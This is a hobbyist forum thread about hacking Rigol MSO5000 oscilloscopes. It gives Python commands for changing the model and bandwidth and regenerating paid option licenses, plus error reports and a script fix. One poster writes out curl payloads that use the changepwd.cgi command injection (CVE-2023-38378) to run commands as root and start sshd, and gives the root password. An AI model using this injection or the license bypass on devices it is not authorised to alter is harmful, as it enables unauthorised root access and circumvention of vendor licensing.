Hacking the Rigol MSO5000 series oscilloscopes

[J-R]

My understanding is that there are two methods to unlocking the scope, the one in this thread and the new one in the other thread.  If you already went through the process using the new method, changing the model number is pretty straightforward since you'll already be familiar with much of the process.  If not, then I think you'll want to read BTO's documentation to fill in some of the gaps.

[Elektro]

@J-R: Yes I have used the new method to update the scope to 350MHz.

With a few changes to the original instructions (Reply #2981), I was able to switch the oscilloscope from 350 MHz to 500MHz and reactivate all options.

Without the extension “--model <your_desired_model>”, the Python script will terminate with an error message, as shown in “Reply #3220” (except in step 5).
The problem appears to be independent of the Python version (tested with Python 3.13.7 and 3.10.11).
For Step 5 the python script "Rigol_MSO_LicensingUtility_2.10b.py" was used.

Code: [Select]

#1 -> save current sysvendor
python rigol_mso_util_2.13b.py --save-sysvendor <rigol_ip_address> --model < your_desired_model>


Code: [Select]

#2 -> find the device xxtea key
python rigol_mso_util_2.13b.py --sysvendor-key <rigol_ip_address> --model < your_desired_model>

On the screen: DEVICE XXTEA KEY [COPY WHAT IS BETWEEN THE SQUARE BRACKETS]

Code: [Select]

#3 -> change sysvendor model in sysvendor file (can also be used on --mac and --serial)
python rigol_mso_util_2.13b.py --offline --sysvendor-file <file_saved_at_step_1> --use-sysvendor-key <only_the_key_from_step_2> --model <your_desired_model>


Code: [Select]

#4 -> write modified sysvendor to device
python rigol_mso_util_2.13b.py --write-sysvendor --write-sysvendor-file <file_from_step_3> <rigol_ip_address> --model <your_desired_model>

From this point on, the oscilloscope runs at 500 MHz, but without options.

Step 5 with “rigol_mso_util_2.13b.py” with and without the extension “--model <your_desired_model>” does not work.

Reboot the device two times.
Set it to default

Code: [Select]

#5 -> reactivate licenses
python Rigol_MSO_LicensingUtility_2.10b.py --regen <rigol_ip_address>

All options are activated.
The oscilloscope with options seems to be functioning properly.

Hint:
Be carefull.
I couldn't find any instructions on how to reinstall the backup files on the Oszi (means NAND, dump, ...)
(and no command instructions in the Python script either).

[Retired2]

@J-R: Yes I have used the new method to update the scope to 350MHz.

With a few changes to the original instructions (Reply #2981), I was able to switch the oscilloscope from 350 MHz to 500MHz and reactivate all options.

Without the extension “--model <your_desired_model>”, the Python script will terminate with an error message, as shown in “Reply #3220” (except in step 5).
The problem appears to be independent of the Python version (tested with Python 3.13.7 and 3.10.11).
For Step 5 the python script "Rigol_MSO_LicensingUtility_2.10b.py" was used.

Code: [Select]

#1 -> save current sysvendor
python rigol_mso_util_2.13b.py --save-sysvendor <rigol_ip_address> --model < your_desired_model>


Code: [Select]

#2 -> find the device xxtea key
python rigol_mso_util_2.13b.py --sysvendor-key <rigol_ip_address> --model < your_desired_model>

On the screen: DEVICE XXTEA KEY [COPY WHAT IS BETWEEN THE SQUARE BRACKETS]

Code: [Select]

#3 -> change sysvendor model in sysvendor file (can also be used on --mac and --serial)
python rigol_mso_util_2.13b.py --offline --sysvendor-file <file_saved_at_step_1> --use-sysvendor-key <only_the_key_from_step_2> --model <your_desired_model>


Code: [Select]

#4 -> write modified sysvendor to device
python rigol_mso_util_2.13b.py --write-sysvendor --write-sysvendor-file <file_from_step_3> <rigol_ip_address> --model <your_desired_model>

From this point on, the oscilloscope runs at 500 MHz, but without options.

Step 5 with “rigol_mso_util_2.13b.py” with and without the extension “--model <your_desired_model>” does not work.

Reboot the device two times.
Set it to default

Code: [Select]

#5 -> reactivate licenses
python Rigol_MSO_LicensingUtility_2.10b.py --regen <rigol_ip_address>

All options are activated.
The oscilloscope with options seems to be functioning properly.

Hint:
Be carefull.
I couldn't find any instructions on how to reinstall the backup files on the Oszi (means NAND, dump, ...)
(and no command instructions in the Python script either).

MSO5354 Attempt to Change Model Failed with additional Issues

After trying to apply 5504 to this model:
As of today 08-11-2025
-= NEW sysvendor.bin =-sysvendor.bin data:
  size=248 ok! | crc32=60C0FE53 [1623260755] ok!

╒════════════╤═════════════════╤══════════════╤═════════════╤══════════════════╤════════════════════════╕
│   key_size │ key_data        │   value_size │ value_crc   │   value_str_size │ value_decrypted_data   │
╞════════════╪═════════════════╪══════════════╪═════════════╪══════════════════╪════════════════════════╡
│         15 │ E_CFG_MODEL_RAW │           56 │ 4B9626E7    │                4 │5504                │
├────────────┼─────────────────┼──────────────┼─────────────┼──────────────────┼────────────────────────┤
│         12 │ E_CFG_SN_RAW    │           52 │ E59DF54E    │               13 │           │
├────────────┼─────────────────┼──────────────┼─────────────┼──────────────────┼────────────────────────┤
│          9 │ E_CFG_MAC       │           56 │ 2AD8E37E    │               17 │      │
╘════════════╧═════════════════╧══════════════╧═════════════╧══════════════════╧════════════════════════╛
Saved sysvendor.bin_mod to 'rigol_sysvendor.bin_mod_17549309591026.data'
sysvendor file has been modified!
PS C:\Users\pspan\MSODump> python rigol_mso_util_2.13b.py --write-sysvendor --write-sysvendor-file rigol_sysvendor.bin_mod_17549309591026.data 192.168.1.4
╒═════════╤═══════════════╤════════════════╤═══════════════════╤═════════════╕
│ Model   │ Serial        │ Version        │ MAC               │ Lic Model   │
╞═════════╪═══════════════╪════════════════╪═══════════════════╪═════════════╡
│ MSO5354 │ │ 00.01.03.03.00 │ │ MSO5000     │
╘═════════╧═══════════════╧════════════════╧═══════════════════╧═════════════╛
╒════════╤══════════╤═════════════════════════════════════════════════════╕
│ Code   │ Status   │ Description                                         │
╞════════╪══════════╪═════════════════════════════════════════════════════╡
│ 2RL    │ Forever  │ 200Mpts Deep Memory Option                          │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ COMP   │ Forever  │ Computer Serial Triggering and Analysis(RS232/UART) │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ EMBD   │ Forever  │ Embedded Serial Triggering and Analysis(IIC, SPI)   │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ AUTO   │ Forever  │ Automotive Serial Triggering and Analysis(CAN/LIN)  │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ FLEX   │ Forever  │ FlexRay Serial Triggering and Analysis              │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ AUDIO  │ Forever  │ Audio Serial Triggering and Analysis(I2S)           │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ AERO   │ Forever  │ MIL-STD 1553 Serial Triggering and Analysis         │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ DG     │ Forever  │ Dual Channel WaveGen 25 MHz AWG                     │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ PWR    │ Forever  │ Integrated Power Analysis                           │
╘════════╧══════════╧═════════════════════════════════════════════════════╛
checking /rigol/tools/fram ...done!
Reading FRAM data ...done!
Patching FRAM binary....done!
Rebooting device...Waiting for device to be back online................................................................done
OK then after reboot I got:
PS C:\Users\pspan\MSODump> python rigol_mso_util_2.13b.py --regen 192.168.1.4

Traceback (most recent call last):
  File "C:\Users\pspan\MSODump\rigol_mso_util_2.13b.py", line 1052, in <module>    main()
    ~~~~^^
  File "C:\Users\pspan\MSODump\rigol_mso_util_2.13b.py", line 881, in main    k_model = helpers.model_to_license_str(model)
 
File "C:\Users\pspan\MSODump\rigol_mso_util_2.13b.py", line 128, in model_to_license_str
    m = re.match(r'([A-Za-z]+)(\d+)([A-Za-z]*)$', model)
 
File "C:\Users\pspan\AppData\Local\Programs\Python\Python313\Lib\re\__init__.py", line 167, in match
    return _compile(pattern, flags).match(string)
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^
TypeError: expected string or bytes-like object, got 'NoneType'

NOW
I have issues: NO Model shown in Web Control screen , Cannot login to Web Control with default Login / password but can use VNC viewer. l cannot enable SSH either. Bandwidth is still 350Mhz.
It appears all other scope functions work.

How can this be fixed?
Thank you for reading this and in advance for your help.

[Elektro]

@Retired2:

Did you have used my additional instructions according to  Reply #3226 or the original instructions according to Reply #2981 by user "BTO"?
Because it seams you don't use the extention "“--model <your_desired_model>”.

If you have followed my additional instructions in Reply #3226,
please read ALL the instructions I wrote in  Reply #3226!

I wrote:
   "For Step 5 the python script "Rigol_MSO_LicensingUtility_2.10b.py" was used."
and
   "Step 5 with “rigol_mso_util_2.13b.py” with and without the extension “--model <your_desired_model>” does not work."

"
   Reboot the device two times.
   Set it to default
"

Check the IP address. After restarting, the device may be assigned a new IP address.

"
   #5 -> reactivate licenses
   python Rigol_MSO_LicensingUtility_2.10b.py --regen <rigol_ip_address>


   All options are activated.
   The oscilloscope with options seems to be functioning properly.
   
   Hint:
   Be carefull.
   I couldn't find any instructions on how to reinstall the backup files on the Oszi (means NAND, dump, ...)
   (and no command instructions in the Python script either).
"

(That was my process!)

For Step 5 you have used "rigol_mso_util_2.13b.py"!
I also received error messages with the version “rigol_mso_util_2.13b.py”.
However, my oscilloscope was already at 500 MHz from step 4 onwards, but without any options.
I therefore suspect that the error lies further up.
I don't know why your oscilloscope is still set to 350MHz.

I have issues: NO Model shown in Web Control screen , Cannot login to Web Control with default Login / password but can use VNC viewer.

I mean, this topic is described in this chat.
I also mean that there is no solution for it.

[Fluffhamster]

I had eye and jitter options activated i menu before. Is there a way to reactivate them? (not that eye option was working but jitter worked)

[sorenkir]

I had eye and jitter options activated i menu before. Is there a way to reactivate them? (not that eye option was working but jitter worked)

Hi,

I have reapplied the "patch method" to my version v00.01.03.03.00 ( https://www.eevblog.com/forum/testgear/hacking-the-rigol-mso5000-series-oscilloscopes/msg4856702/#msg4856702 ) and jitter & eye options have reappeared!

Michel.

[monz]

Hello, thanks for the guide. However, I'm running in to some trouble. I successfully converted a MSO5104 to a MSO5354.

I cannot complete the last step to activate options.

I've tried this under 3.10.x 3.12.x and 3.14.x versions of python from windows and 3.12.x from a machine running linux. Modules it needs installed via pip.

I get the following error:


python.exe" Rigol_MSO_LicensingUtility_2.10b.py --regen 192.168.216.159 --model MSO5354

(Summary table of options/info is displayed here)

Traceback (most recent call last):
  File Rigol_MSO_LicensingUtility_2.10b.py, line 740, in <module>
    main()
  File Rigol_MSO_LicensingUtility_2.10b.py", line 681, in main
    opt_sign, key_hex, prev_key = sign_option({
  File Rigol_MSO_LicensingUtility_2.10b.py", line 81, in sign_option
    bb.extend(opt['model'].encode())
AttributeError: 'NoneType' object has no attribute 'encode'

[monz]

I managed to get this working by hard coding some variables in the script.

I changed:
    model = m.group(1).decode()
    ser = m.group(2).decode()
    ver = m.group(3).decode()
    mac = m.group(4).decode()


To
    model = "MSO5354"
    ser = "MS51234xyz"
    ver = "00.01.03.03.00"
    mac = "00-19-AF-AA-BB-CC"

The values for model, ser, ver, and mac were found by going to:
http://scope-ip/cgi-bin/welcome.cgi

For some reason the script isn't parsing this info.
SERIAL_PAT's regex probably just needs to be fixed, not sure how to fix that so I just hard coded it for mine to get it to run.

[jhobbyist]

Web Control is broken after using the changepwd exploit, which the Python utility uses. You can restore it with a simple curl command:

Code: [Select]

curl --location 'http://<scope-ip>/cgi-bin/changepwd.cgi' \
    --form 'pass0=""' \
    --form 'pass1="rigol"'

Long story short, the script takes advantage of CVE-2023-38378 to execute arbitrary commands as root, which "corrupts" the password file used by web control. The above curl command restores the password using the same exploit.

[jhobbyist]

NOW
I have issues: NO Model shown in Web Control screen , Cannot login to Web Control with default Login / password but can use VNC viewer. l cannot enable SSH either. Bandwidth is still 350Mhz.
It appears all other scope functions work.

How can this be fixed?
Thank you for reading this, and in advance for your help.

My previous post resolves your Web Control login issue. For SSH, you can either use the Python script or directly invoke sshd using the same exploit. You will need to execute this on every boot to re-enable access, and you will need to restore the Web Control password after each execution. For simplicity, here is a single command that will enable ssh and restore the default Web Control password:

Code: [Select]

curl --location 'http://<scope-ip>/cgi-bin/changepwd.cgi' \
    --form 'pass0=""' \
    --form 'pass1=";/usr/bin/sshd; echo admin:rigol"'


You will now be able to log in as root:

Code: [Select]

ssh root@<scope-ip>Password: Rigol201

Now that you have SSH access, there are ways to enable SSH at startup. I haven't taken the time to learn the startup process for the Linux implementation on the scope, so I'll leave that for this community.

Note: For those who are curious about the Web Control password, you can SSH in and cat the password file before restoring the password and see that it contains the output from the last command executed.

Code: [Select]

cat /rigol/default/user.conf

[rpro]

If you haven’t tried it yet, VNC is worth a look. The scope has a built-in running VNC server, and you can connect with a viewer like RealVNC with no password needed. You’ll also find it has much less latency than the web-control option.

[jhobbyist]

I was using VNC, I just do not like having features that do not work . After some digging through this thread, I see this has been addressed by BTO previously in 2.13b; my above responses were based on the 2.10 Python utility. The curl API method I posted still works for starting SSH, but here are the Python commands to start SSH on boot and fix the Web Control password:

Enable SSH on boot:

Code: [Select]

python rigol_mso_util_2.13b.py --ssh --start-sshd-on-boot <scope-ip>
Reset Web Control Password:

Code: [Select]

python rigol_mso_util_2.13b.py --reset-web-pwd <scope-ip>